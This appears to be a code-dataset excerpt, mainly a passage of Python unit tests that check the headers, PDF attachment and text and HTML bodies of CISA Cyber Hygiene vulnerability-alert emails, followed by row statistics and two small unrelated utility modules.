WARNING: This message and any attached document(s) is FOR OFFICIAL USE ONLY (FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.G. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public or other personnel who do not have a valid "need-to-know" without prior approval of an authorized DHS official.
"""
self.assertEqual(part.get_payload(), text_body)
elif part.get_content_type() == "text/html":
html_body = """<html>
<head></head>
<body>
<p>Greetings FEDTEST,</p>
<p>Cyber Hygiene scans of your host(s) conducted in the past day have detected one or both of the following:
<ul>
<li>New critical and/or high vulnerabilities</li>
<li>New potentially risky services</li>
</ul>
</p>
<p>As part of <a href="https://cyber.dhs.gov/bod/19-02/">BOD 19-02</a>, critical findings need to be remediated within 15 days and high findings remediated within 30 days.</p>
<p>CISA also recommends reviewing hosts with potentially risky open services (e.g. RDP, Telnet, etc.) to ensure that each service is intended to be available to the public and, where applicable, the service is up-to-date on the latest version, correctly configured, and uses strong authentication.</p>
<p>The details are in the attached PDF, which has the same password as your Cyber Hygiene report.</p>
<p>If you have any questions, please contact our office.</p>
<p>Cheers,<br>
CISA Cyber Assessments - Cyber Hygiene<br>
Cybersecurity and Infrastructure Security Agency<br>
<a href="mailto:vulnerability@cisa.dhs.gov">vulnerability@cisa.dhs.gov</a></p>
<p>WARNING: This message and any attached document(s) is FOR OFFICIAL USE ONLY (FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.G. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public or other personnel who do not have a valid “need-to-know” without prior approval of an authorized DHS official.</p>
</body>
</html>
"""
self.assertEqual(part.get_payload(), html_body)
def test_four_params_multiple_recipients_fed(self):
"""Test the 4-parameter Federal version of the constructor."""
to = ["recipient@example.com", "recipient2@example.com"]
pdf = "./tests/data/pdf-sample.pdf"
agency_acronym = "FEDTEST"
is_federal = True
report_date = "December 15, 2001"
message = CyhyNotificationMessage(
to, pdf, agency_acronym, is_federal, report_date
)
self.assertEqual(message["From"], "reports@cyber.dhs.gov")
self.assertEqual(
message["Subject"],
"FEDTEST - Cyber Hygiene Alert - December 15, 2001",
)
self.assertEqual(message.get("CC"), None)
self.assertEqual(message["BCC"], "cyhy_reports@hq.dhs.gov")
self.assertEqual(message["To"], "recipient@example.com,recipient2@example.com")
# Grab the bytes that comprise the attachment
bytes = open(pdf, "rb").read()
# Make sure the correct body and PDF attachments were added
for part in message.walk():
# multipart/* are just containers
if part.get_content_type() == "application/pdf":
self.assertEqual(part.get_payload(decode=True), bytes)
self.assertEqual(part.get_filename(), "pdf-sample.pdf")
elif part.get_content_type() == "text/plain":
body = """Greetings FEDTEST,
Cyber Hygiene scans of your host(s) conducted in the past day have detected one or both of the following:
* New critical and/or high vulnerabilities
* New potentially risky services
As part of BOD 19-02, critical findings need to be remediated within 15 days and high findings remediated within 30 days.
CISA also recommends reviewing hosts with potentially risky open services (e.g. RDP, Telnet, etc.) to ensure that each service is intended to be available to the public and, where applicable, the service is up-to-date on the latest version, correctly configured, and uses strong authentication.
The details are in the attached PDF, which has the same password as your Cyber Hygiene report.
If you have any questions, please contact our office.
Cheers,
CISA Cyber Assessments - Cyber Hygiene
Cybersecurity and Infrastructure Security Agency
vulnerability@cisa.dhs.gov
WARNING: This message and any attached document(s) is FOR OFFICIAL USE ONLY (FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.G. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public or other personnel who do not have a valid "need-to-know" without prior approval of an authorized DHS official.
"""
self.assertEqual(part.get_payload(), body)
elif part.get_content_type() == "text/html":
html_body = """<html>
<head></head>
<body>
<p>Greetings FEDTEST,</p>
<p>Cyber Hygiene scans of your host(s) conducted in the past day have detected one or both of the following:
<ul>
<li>New critical and/or high vulnerabilities</li>
<li>New potentially risky services</li>
</ul>
</p>
<p>As part of <a href="https://cyber.dhs.gov/bod/19-02/">BOD 19-02</a>, critical findings need to be remediated within 15 days and high findings remediated within 30 days.</p>
<p>CISA also recommends reviewing hosts with potentially risky open services (e.g. RDP, Telnet, etc.) to ensure that each service is intended to be available to the public and, where applicable, the service is up-to-date on the latest version, correctly configured, and uses strong authentication.</p>
<p>The details are in the attached PDF, which has the same password as your Cyber Hygiene report.</p>
<p>If you have any questions, please contact our office.</p>
<p>Cheers,<br>
CISA Cyber Assessments - Cyber Hygiene<br>
Cybersecurity and Infrastructure Security Agency<br>
<a href="mailto:vulnerability@cisa.dhs.gov">vulnerability@cisa.dhs.gov</a></p>
<p>WARNING: This message and any attached document(s) is FOR OFFICIAL USE ONLY (FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.G. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public or other personnel who do not have a valid “need-to-know” without prior approval of an authorized DHS official.</p>
</body>
</html>
"""
self.assertEqual(part.get_payload(), html_body)
def test_six_params_single_cc_fed(self):
"""Test the 6-parameter Federal version of the constructor."""
to = ["recipient@example.com", "recipient2@example.com"]
pdf = "./tests/data/pdf-sample.pdf"
fm = "sender@example.com"
cc = ["cc@example.com"]
bcc = ["bcc@example.com"]
agency_acronym = "FEDTEST"
is_federal = True
report_date = "December 15, 2001"
message = CyhyNotificationMessage(
to,
pdf,
agency_acronym,
is_federal,
report_date,
from_addr=fm,
cc_addrs=cc,
bcc_addrs=bcc,
)
self.assertEqual(message["From"], fm)
self.assertEqual(
message["Subject"],
"FEDTEST - Cyber Hygiene Alert - December 15, 2001",
)
self.assertEqual(message["CC"], "cc@example.com")
self.assertEqual(message["BCC"], "bcc@example.com")
self.assertEqual(message["To"], "recipient@example.com,recipient2@example.com")
# Grab the bytes that comprise the attachment
bytes = open(pdf, "rb").read()
# Make sure the correct body and PDF attachments were added
for part in message.walk():
# multipart/* are just containers
if part.get_content_type() == "application/pdf":
self.assertEqual(part.get_payload(decode=True), bytes)
self.assertEqual(part.get_filename(), "pdf-sample.pdf")
elif part.get_content_type() == "text/plain":
body = """Greetings FEDTEST,
Cyber Hygiene scans of your host(s) conducted in the past day have detected one or both of the following:
* New critical and/or high vulnerabilities
* New potentially risky services
As part of BOD 19-02, critical findings need to be remediated within 15 days and high findings remediated within 30 days.
CISA also recommends reviewing hosts with potentially risky open services (e.g. RDP, Telnet, etc.) to ensure that each service is intended to be available to the public and, where applicable, the service is up-to-date on the latest version, correctly configured, and uses strong authentication.
The details are in the attached PDF, which has the same password as your Cyber Hygiene report.
If you have any questions, please contact our office.
Cheers,
CISA Cyber Assessments - Cyber Hygiene
Cybersecurity and Infrastructure Security Agency
vulnerability@cisa.dhs.gov
WARNING: This message and any attached document(s) is FOR OFFICIAL USE ONLY (FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.G. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public or other personnel who do not have a valid "need-to-know" without prior approval of an authorized DHS official.
"""
self.assertEqual(part.get_payload(), body)
elif part.get_content_type() == "text/html":
html_body = """<html>
<head></head>
<body>
<p>Greetings FEDTEST,</p>
<p>Cyber Hygiene scans of your host(s) conducted in the past day have detected one or both of the following:
<ul>
<li>New critical and/or high vulnerabilities</li>
<li>New potentially risky services</li>
</ul>
</p>
<p>As part of <a href="https://cyber.dhs.gov/bod/19-02/">BOD 19-02</a>, critical findings need to be remediated within 15 days and high findings remediated within 30 days.</p>
<p>CISA also recommends reviewing hosts with potentially risky open services (e.g. RDP, Telnet, etc.) to ensure that each service is intended to be available to the public and, where applicable, the service is up-to-date on the latest version, correctly configured, and uses strong authentication.</p>
<p>The details are in the attached PDF, which has the same password as your Cyber Hygiene report.</p>
<p>If you have any questions, please contact our office.</p>
<p>Cheers,<br>
CISA Cyber Assessments - Cyber Hygiene<br>
Cybersecurity and Infrastructure Security Agency<br>
<a href="mailto:vulnerability@cisa.dhs.gov">vulnerability@cisa.dhs.gov</a></p>
<p>WARNING: This message and any attached document(s) is FOR OFFICIAL USE ONLY (FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.G. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public or other personnel who do not have a valid “need-to-know” without prior approval of an authorized DHS official.</p>
</body>
</html>
"""
self.assertEqual(part.get_payload(), html_body)
def test_six_params_multiple_cc_fed(self):
"""Test the 6-parameter Federal version of the constructor."""
to = ["recipient@example.com", "recipient2@example.com"]
pdf = "./tests/data/pdf-sample.pdf"
fm = "sender@example.com"
cc = ["cc@example.com", "cc2@example.com"]
bcc = ["bcc@example.com", "bcc2@example.com"]
agency_acronym = "FEDTEST"
is_federal = True
report_date = "December 15, 2001"
message = CyhyNotificationMessage(
to,
pdf,
agency_acronym,
is_federal,
report_date,
from_addr=fm,
cc_addrs=cc,
bcc_addrs=bcc,
)
self.assertEqual(message["From"], fm)
self.assertEqual(
message["Subject"],
"FEDTEST - Cyber Hygiene Alert - December 15, 2001",
)
self.assertEqual(message["CC"], "cc@example.com,cc2@example.com")
self.assertEqual(message["BCC"], "bcc@example.com,bcc2@example.com")
self.assertEqual(message["To"], "recipient@example.com,recipient2@example.com")
# Grab the bytes that comprise the attachment
bytes = open(pdf, "rb").read()
# Make sure the correct body and PDF attachments were added
for part in message.walk():
# multipart/* are just containers
if part.get_content_type() == "application/pdf":
self.assertEqual(part.get_payload(decode=True), bytes)
self.assertEqual(part.get_filename(), "pdf-sample.pdf")
elif part.get_content_type() == "text/plain":
body = """Greetings FEDTEST,
Cyber Hygiene scans of your host(s) conducted in the past day have detected one or both of the following:
* New critical and/or high vulnerabilities
* New potentially risky services
As part of BOD 19-02, critical findings need to be remediated within 15 days and high findings remediated within 30 days.
CISA also recommends reviewing hosts with potentially risky open services (e.g. RDP, Telnet, etc.) to ensure that each service is intended to be available to the public and, where applicable, the service is up-to-date on the latest version, correctly configured, and uses strong authentication.
The details are in the attached PDF, which has the same password as your Cyber Hygiene report.
If you have any questions, please contact our office.
Cheers,
CISA Cyber Assessments - Cyber Hygiene
Cybersecurity and Infrastructure Security Agency
vulnerability@cisa.dhs.gov
WARNING: This message and any attached document(s) is FOR OFFICIAL USE ONLY (FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.G. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public or other personnel who do not have a valid "need-to-know" without prior approval of an authorized DHS official.
"""
self.assertEqual(part.get_payload(), body)
elif part.get_content_type() == "text/html":
html_body = """<html>
<head></head>
<body>
<p>Greetings FEDTEST,</p>
<p>Cyber Hygiene scans of your host(s) conducted in the past day have detected one or both of the following:
<ul>
<li>New critical and/or high vulnerabilities</li>
<li>New potentially risky services</li>
</ul>
</p>
<p>As part of <a href="https://cyber.dhs.gov/bod/19-02/">BOD 19-02</a>, critical findings need to be remediated within 15 days and high findings remediated within 30 days.</p>
<p>CISA also recommends reviewing hosts with potentially risky open services (e.g. RDP, Telnet, etc.) to ensure that each service is intended to be available to the public and, where applicable, the service is up-to-date on the latest version, correctly configured, and uses strong authentication.</p>
<p>The details are in the attached PDF, which has the same password as your Cyber Hygiene report.</p>
<p>If you have any questions, please contact our office.</p>
<p>Cheers,<br>
CISA Cyber Assessments - Cyber Hygiene<br>
Cybersecurity and Infrastructure Security Agency<br>
<a href="mailto:vulnerability@cisa.dhs.gov">vulnerability@cisa.dhs.gov</a></p>
<p>WARNING: This message and any attached document(s) is FOR OFFICIAL USE ONLY (FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.G. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public or other personnel who do not have a valid “need-to-know” without prior approval of an authorized DHS official.</p>
</body>
</html>
"""
self.assertEqual(part.get_payload(), html_body)
def test_four_params_single_recipient_nonfed(self):
"""Test the 4-parameter non-Federal version of the constructor."""
to = ["recipient@example.com"]
pdf = "./tests/data/pdf-sample.pdf"
agency_acronym = "NONFEDTEST"
is_federal = False
report_date = "December 15, 2001"
message = CyhyNotificationMessage(
to, pdf, agency_acronym, is_federal, report_date
)
self.assertEqual(message["From"], "reports@cyber.dhs.gov")
self.assertEqual(
message["Subject"],
"NONFEDTEST - Cyber Hygiene Alert - December 15, 2001",
)
self.assertEqual(message.get("CC"), None)
self.assertEqual(message["BCC"], "cyhy_reports@hq.dhs.gov")
self.assertEqual(message["To"], "recipient@example.com")
# Grab the bytes that comprise the attachment
bytes = open(pdf, "rb").read()
# Make sure the correct body and PDF attachments were added
for part in message.walk():
# multipart/* are just containers
if part.get_content_type() == "application/pdf":
self.assertEqual(part.get_payload(decode=True), bytes)
self.assertEqual(part.get_filename(), "pdf-sample.pdf")
elif part.get_content_type() == "text/plain":
text_body = """Greetings NONFEDTEST,
Cyber Hygiene scans of your host(s) conducted in the past day have detected one or both of the following:
* New critical and/or high vulnerabilities
* New potentially risky services
CISA recommends remediating critical findings within 15 days and high findings within 30 days.
CISA also recommends reviewing hosts with potentially risky open services (e.g. RDP, Telnet, etc.) to ensure that each service is intended to be available to the public and, where applicable, the service is up-to-date on the latest version, correctly configured, and uses strong authentication.
The details are in the attached PDF, which has the same password as your Cyber Hygiene report.
If you have any questions, please contact our office.
Cheers,
CISA Cyber Assessments - Cyber Hygiene
Cybersecurity and Infrastructure Security Agency
vulnerability@cisa.dhs.gov
WARNING: This message and any attached document(s) is FOR OFFICIAL USE ONLY (FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.G. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public or other personnel who do not have a valid "need-to-know" without prior approval of an authorized DHS official.
"""
self.assertEqual(part.get_payload(), text_body)
elif part.get_content_type() == "text/html":
html_body = """<html>
<head></head>
<body>
<p>Greetings NONFEDTEST,</p>
<p>Cyber Hygiene scans of your host(s) conducted in the past day have detected one or both of the following:
<ul>
<li>New critical and/or high vulnerabilities</li>
<li>New potentially risky services</li>
</ul>
</p>
<p>CISA recommends remediating critical findings within 15 days and high findings within 30 days.</p>
<p>CISA also recommends reviewing hosts with potentially risky open services (e.g. RDP, Telnet, etc.) to ensure that each service is intended to be available to the public and, where applicable, the service is up-to-date on the latest version, correctly configured, and uses strong authentication.</p>
<p>The details are in the attached PDF, which has the same password as your Cyber Hygiene report.</p>
<p>If you have any questions, please contact our office.</p>
<p>Cheers,<br>
CISA Cyber Assessments - Cyber Hygiene<br>
Cybersecurity and Infrastructure Security Agency<br>
<a href="mailto:vulnerability@cisa.dhs.gov">vulnerability@cisa.dhs.gov</a></p>
<p>WARNING: This message and any attached document(s) is FOR OFFICIAL USE ONLY (FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.G. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public or other personnel who do not have a valid “need-to-know” without prior approval of an authorized DHS official.</p>
</body>
</html>
"""
self.assertEqual(part.get_payload(), html_body)
def test_four_params_multiple_recipients_nonfed(self):
"""Test the 4-parameter non-Federal version of the constructor."""
to = ["recipient@example.com", "recipient2@example.com"]
pdf = "./tests/data/pdf-sample.pdf"
agency_acronym = "NONFEDTEST"
is_federal = False
report_date = "December 15, 2001"
message = CyhyNotificationMessage(
to, pdf, agency_acronym, is_federal, report_date
)
self.assertEqual(message["From"], "reports@cyber.dhs.gov")
self.assertEqual(
message["Subject"],
"NONFEDTEST - Cyber Hygiene Alert - December 15, 2001",
)
self.assertEqual(message.get("CC"), None)
self.assertEqual(message["BCC"], "cyhy_reports@hq.dhs.gov")
self.assertEqual(message["To"], "recipient@example.com,recipient2@example.com")
# Grab the bytes that comprise the attachment
bytes = open(pdf, "rb").read()
# Make sure the correct body and PDF attachments were added
for part in message.walk():
# multipart/* are just containers
if part.get_content_type() == "application/pdf":
self.assertEqual(part.get_payload(decode=True), bytes)
self.assertEqual(part.get_filename(), "pdf-sample.pdf")
elif part.get_content_type() == "text/plain":
body = """Greetings NONFEDTEST,
Cyber Hygiene scans of your host(s) conducted in the past day have detected one or both of the following:
* New critical and/or high vulnerabilities
* New potentially risky services
CISA recommends remediating critical findings within 15 days and high findings within 30 days.
CISA also recommends reviewing hosts with potentially risky open services (e.g. RDP, Telnet, etc.) to ensure that each service is intended to be available to the public and, where applicable, the service is up-to-date on the latest version, correctly configured, and uses strong authentication.
The details are in the attached PDF, which has the same password as your Cyber Hygiene report.
If you have any questions, please contact our office.
Cheers,
CISA Cyber Assessments - Cyber Hygiene
Cybersecurity and Infrastructure Security Agency
vulnerability@cisa.dhs.gov
WARNING: This message and any attached document(s) is FOR OFFICIAL USE ONLY (FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.G. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public or other personnel who do not have a valid "need-to-know" without prior approval of an authorized DHS official.
"""
self.assertEqual(part.get_payload(), body)
elif part.get_content_type() == "text/html":
html_body = """<html>
<head></head>
<body>
<p>Greetings NONFEDTEST,</p>
<p>Cyber Hygiene scans of your host(s) conducted in the past day have detected one or both of the following:
<ul>
<li>New critical and/or high vulnerabilities</li>
<li>New potentially risky services</li>
</ul>
</p>
<p>CISA recommends remediating critical findings within 15 days and high findings within 30 days.</p>
<p>CISA also recommends reviewing hosts with potentially risky open services (e.g. RDP, Telnet, etc.) to ensure that each service is intended to be available to the public and, where applicable, the service is up-to-date on the latest version, correctly configured, and uses strong authentication.</p>
<p>The details are in the attached PDF, which has the same password as your Cyber Hygiene report.</p>
<p>If you have any questions, please contact our office.</p>
<p>Cheers,<br>
CISA Cyber Assessments - Cyber Hygiene<br>
Cybersecurity and Infrastructure Security Agency<br>
<a href="mailto:vulnerability@cisa.dhs.gov">vulnerability@cisa.dhs.gov</a></p>
<p>WARNING: This message and any attached document(s) is FOR OFFICIAL USE ONLY (FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.G. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public or other personnel who do not have a valid “need-to-know” without prior approval of an authorized DHS official.</p>
</body>
</html>
"""
self.assertEqual(part.get_payload(), html_body)
def test_six_params_single_cc_nonfed(self):
"""Test the 6-parameter non-Federal version of the constructor."""
to = ["recipient@example.com", "recipient2@example.com"]
pdf = "./tests/data/pdf-sample.pdf"
fm = "sender@example.com"
cc = ["cc@example.com"]
bcc = ["bcc@example.com"]
agency_acronym = "NONFEDTEST"
is_federal = False
report_date = "December 15, 2001"
message = CyhyNotificationMessage(
to,
pdf,
agency_acronym,
is_federal,
report_date,
from_addr=fm,
cc_addrs=cc,
bcc_addrs=bcc,
)
self.assertEqual(message["From"], fm)
self.assertEqual(
message["Subject"],
"NONFEDTEST - Cyber Hygiene Alert - December 15, 2001",
)
self.assertEqual(message["CC"], "cc@example.com")
self.assertEqual(message["BCC"], "bcc@example.com")
self.assertEqual(message["To"], "recipient@example.com,recipient2@example.com")
# Grab the bytes that comprise the attachment
bytes = open(pdf, "rb").read()
# Make sure the correct body and PDF attachments were added
for part in message.walk():
# multipart/* are just containers
if part.get_content_type() == "application/pdf":
self.assertEqual(part.get_payload(decode=True), bytes)
self.assertEqual(part.get_filename(), "pdf-sample.pdf")
elif part.get_content_type() == "text/plain":
body = """Greetings NONFEDTEST,
Cyber Hygiene scans of your host(s) conducted in the past day have detected one or both of the following:
* New critical and/or high vulnerabilities
* New potentially risky services
CISA recommends remediating critical findings within 15 days and high findings within 30 days.
CISA also recommends reviewing hosts with potentially risky open services (e.g. RDP, Telnet, etc.) to ensure that each service is intended to be available to the public and, where applicable, the service is up-to-date on the latest version, correctly configured, and uses strong authentication.
The details are in the attached PDF, which has the same password as your Cyber Hygiene report.
If you have any questions, please contact our office.
Cheers,
CISA Cyber Assessments - Cyber Hygiene
Cybersecurity and Infrastructure Security Agency
vulnerability@cisa.dhs.gov
WARNING: This message and any attached document(s) is FOR OFFICIAL USE ONLY (FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.G. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public or other personnel who do not have a valid "need-to-know" without prior approval of an authorized DHS official.
"""
self.assertEqual(part.get_payload(), body)
elif part.get_content_type() == "text/html":
html_body = """<html>
<head></head>
<body>
<p>Greetings NONFEDTEST,</p>
<p>Cyber Hygiene scans of your host(s) conducted in the past day have detected one or both of the following:
<ul>
<li>New critical and/or high vulnerabilities</li>
<li>New potentially risky services</li>
</ul>
</p>
<p>CISA recommends remediating critical findings within 15 days and high findings within 30 days.</p>
<p>CISA also recommends reviewing hosts with potentially risky open services (e.g. RDP, Telnet, etc.) to ensure that each service is intended to be available to the public and, where applicable, the service is up-to-date on the latest version, correctly configured, and uses strong authentication.</p>
<p>The details are in the attached PDF, which has the same password as your Cyber Hygiene report.</p>
<p>If you have any questions, please contact our office.</p>
<p>Cheers,<br>
CISA Cyber Assessments - Cyber Hygiene<br>
Cybersecurity and Infrastructure Security Agency<br>
<a href="mailto:vulnerability@cisa.dhs.gov">vulnerability@cisa.dhs.gov</a></p>
<p>WARNING: This message and any attached document(s) is FOR OFFICIAL USE ONLY (FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.G. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public or other personnel who do not have a valid “need-to-know” without prior approval of an authorized DHS official.</p>
</body>
</html>
"""
self.assertEqual(part.get_payload(), html_body)
def test_six_params_multiple_cc_nonfed(self):
"""Test the 6-parameter non-Federal version of the constructor."""
to = ["recipient@example.com", "recipient2@example.com"]
pdf = "./tests/data/pdf-sample.pdf"
fm = "sender@example.com"
cc = ["cc@example.com", "cc2@example.com"]
bcc = ["bcc@example.com", "bcc2@example.com"]
agency_acronym = "NONFEDTEST"
is_federal = False
report_date = "December 15, 2001"
message = CyhyNotificationMessage(
to,
pdf,
agency_acronym,
is_federal,
report_date,
from_addr=fm,
cc_addrs=cc,
bcc_addrs=bcc,
)
self.assertEqual(message["From"], fm)
self.assertEqual(
message["Subject"],
"NONFEDTEST - Cyber Hygiene Alert - December 15, 2001",
)
self.assertEqual(message["CC"], "cc@example.com,cc2@example.com")
self.assertEqual(message["BCC"], "bcc@example.com,bcc2@example.com")
self.assertEqual(message["To"], "recipient@example.com,recipient2@example.com")
# Grab the bytes that comprise the attachment
bytes = open(pdf, "rb").read()
# Make sure the correct body and PDF attachments were added
for part in message.walk():
# multipart/* are just containers
if part.get_content_type() == "application/pdf":
self.assertEqual(part.get_payload(decode=True), bytes)
self.assertEqual(part.get_filename(), "pdf-sample.pdf")
elif part.get_content_type() == "text/plain":
body = """Greetings NONFEDTEST,
Cyber Hygiene scans of your host(s) conducted in the past day have detected one or both of the following:
* New critical and/or high vulnerabilities
* New potentially risky services
CISA recommends remediating critical findings within 15 days and high findings within 30 days.
CISA also recommends reviewing hosts with potentially risky open services (e.g. RDP, Telnet, etc.) to ensure that each service is intended to be available to the public and, where applicable, the service is up-to-date on the latest version, correctly configured, and uses strong authentication.
The details are in the attached PDF, which has the same password as your Cyber Hygiene report.
If you have any questions, please contact our office.
Cheers,
CISA Cyber Assessments - Cyber Hygiene
Cybersecurity and Infrastructure Security Agency
vulnerability@cisa.dhs.gov
WARNING: This message and any attached document(s) is FOR OFFICIAL USE ONLY (FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.G. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public or other personnel who do not have a valid "need-to-know" without prior approval of an authorized DHS official.
"""
self.assertEqual(part.get_payload(), body)
elif part.get_content_type() == "text/html":
html_body = """<html>
<head></head>
<body>
<p>Greetings NONFEDTEST,</p>
<p>Cyber Hygiene scans of your host(s) conducted in the past day have detected one or both of the following:
<ul>
<li>New critical and/or high vulnerabilities</li>
<li>New potentially risky services</li>
</ul>
</p>
<p>CISA recommends remediating critical findings within 15 days and high findings within 30 days.</p>
<p>CISA also recommends reviewing hosts with potentially risky open services (e.g. RDP, Telnet, etc.) to ensure that each service is intended to be available to the public and, where applicable, the service is up-to-date on the latest version, correctly configured, and uses strong authentication.</p>
<p>The details are in the attached PDF, which has the same password as your Cyber Hygiene report.</p>
<p>If you have any questions, please contact our office.</p>
<p>Cheers,<br>
CISA Cyber Assessments - Cyber Hygiene<br>
Cybersecurity and Infrastructure Security Agency<br>
<a href="mailto:vulnerability@cisa.dhs.gov">vulnerability@cisa.dhs.gov</a></p>
<p>WARNING: This message and any attached document(s) is FOR OFFICIAL USE ONLY (FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.G. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public or other personnel who do not have a valid “need-to-know” without prior approval of an authorized DHS official.</p>
</body>
</html>
"""
self.assertEqual(part.get_payload(), html_body)
if __name__ == "__main__":
unittest.main()
| 51.677989 | 512 | 0.707611 | 5,493 | 38,035 | 4.861096 | 0.044056 | 0.040446 | 0.032956 | 0.026365 | 0.993109 | 0.993109 | 0.988203 | 0.988203 | 0.988203 | 0.988203 | 0 | 0.009896 | 0.202945 | 38,035 | 735 | 513 | 51.748299 | 0.870893 | 0.04488 | 0 | 0.942699 | 0 | 0.133087 | 0.729836 | 0.058976 | 0 | 0 | 0 | 0 | 0.133087 | 1 | 0.014787 | false | 0.029575 | 0.003697 | 0 | 0.020333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
0d501eefe3ce134fe25493327643330889e3892b | 189 | py | Python | dvc/utils/flatten.py | lucasalavapena/dvc | 230eb7087df7f063ded7422af7ae45bd04eb794a | [
"Apache-2.0"
] | 9,136 | 2018-05-30T05:10:44.000Z | 2022-03-31T16:58:52.000Z | dvc/utils/flatten.py | 4nalog/dvc | 13c1314099df131f526177b2a75bda02dfc0cdbf | [
"Apache-2.0"
] | 4,804 | 2018-05-30T00:36:42.000Z | 2022-03-31T18:34:54.000Z | dvc/utils/flatten.py | 4nalog/dvc | 13c1314099df131f526177b2a75bda02dfc0cdbf | [
"Apache-2.0"
] | 1,072 | 2018-05-30T07:59:35.000Z | 2022-03-28T20:43:49.000Z | def flatten(d):
import flatten_dict
return flatten_dict.flatten(d, reducer="dot")
def unflatten(d):
import flatten_dict
return flatten_dict.unflatten(d, splitter="dot")
| 17.181818 | 52 | 0.714286 | 26 | 189 | 5.038462 | 0.384615 | 0.335878 | 0.21374 | 0.274809 | 0.534351 | 0.534351 | 0.534351 | 0 | 0 | 0 | 0 | 0 | 0.179894 | 189 | 10 | 53 | 18.9 | 0.845161 | 0 | 0 | 0.333333 | 0 | 0 | 0.031746 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
b4e8bec0f85ca78a79d80de607eee0f6602a21f9 | 79 | py | Python | region/api.py | Dexterzhao/region | 596476ad291bfbbeb7d88bb70503aff89c1df59c | [
"BSD-3-Clause"
] | 15 | 2018-05-17T07:17:43.000Z | 2022-02-20T19:00:58.000Z | region/api.py | Dexterzhao/region | 596476ad291bfbbeb7d88bb70503aff89c1df59c | [
"BSD-3-Clause"
] | 29 | 2017-09-23T20:46:26.000Z | 2019-12-18T20:16:56.000Z | region/api.py | Dexterzhao/region | 596476ad291bfbbeb7d88bb70503aff89c1df59c | [
"BSD-3-Clause"
] | 17 | 2017-06-23T17:37:44.000Z | 2020-04-15T16:45:35.000Z | from .max_p_regions import api as maxp
from .p_regions import api as p_regions
| 26.333333 | 39 | 0.822785 | 16 | 79 | 3.8125 | 0.5 | 0.393443 | 0.459016 | 0.557377 | 0.622951 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.151899 | 79 | 2 | 40 | 39.5 | 0.910448 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
b4e9604f2cacda1cd40451bb5e8757ad8146f43d | 4,845 | py | Python | lit_nlp/examples/models/glue_models_test.py | eichinflo/lit | b46c0cac34baa571242637b53b78cfd69de536d0 | [
"Apache-2.0"
] | 2,854 | 2020-08-12T15:51:12.000Z | 2022-03-31T08:24:13.000Z | lit_nlp/examples/models/glue_models_test.py | soma2000-lang/lit | b46c0cac34baa571242637b53b78cfd69de536d0 | [
"Apache-2.0"
